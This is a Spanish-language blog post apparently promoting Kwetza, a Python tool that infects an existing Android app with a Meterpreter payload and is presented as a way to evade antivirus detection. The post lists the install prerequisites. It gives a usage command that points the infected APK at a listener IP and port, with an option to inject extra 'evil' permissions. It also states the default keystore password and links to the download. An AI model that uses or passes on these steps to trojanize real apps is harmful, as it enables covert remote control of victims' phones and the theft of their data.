Kwetza es una herramienta que le permite infectar una aplicación Android existente con un payload Meterpreter.

¿Qué hace?

Kwetza infecta una aplicación Android existente con plantillas de payloads personalizadas o predeterminadas para evitar la detección por antivirus. Kwetza te permite infectar las aplicaciones de Android utilizando los permisos predeterminados de la aplicación de destino o inyectar permisos adicionales para obtener funcionalidad adicional.

Instalación:

Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar usando Pip:

Kwetza requiere que Apktool sea instalado y accesible a través de su PATH. Esto se puede configurar usando las instrucciones de instalación que se encuentran aquí: https://ibotpeaches.github.io/Apktool/install

Modo de uso:

nameOfTheApkToInfect.apk =name of the APK you wish to infect.
LHOST =IP of your listener.
LPORT =Port of your listener.
yes =include “yes” to inject additional evil perms into the app, “no” to utilize the default permissions of the app.

python kwetza.py hackme.apk 10.42.0.118 4444 yes

Información

Kwetza ha sido desarrollado para trabajar con Python 2.
Kwetza usará por defecto la plantilla y el keystore ubicados en la carpeta “payload” para inyectar y firmar el apk infectado.
Si desea firmar la aplicación infectada con su propio certificado, genere un nuevo keystore y colóquelo en la carpeta “payload” y cambie el nombre al keystore existente o cambie la referencia en kwetza.py.
Lo mismo se puede hacer para las plantillas de payload.
La contraseña para el keystore predeterminado es, “password”.

Descarga: https://github.com/sensepost/kwetza

 

Posts Relacionados

Comments

comments

Deja una respuesta

Tu email no será publicado. Los campos requeridos estan marcados con *
Puedes usar tags HTML y los atributos: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">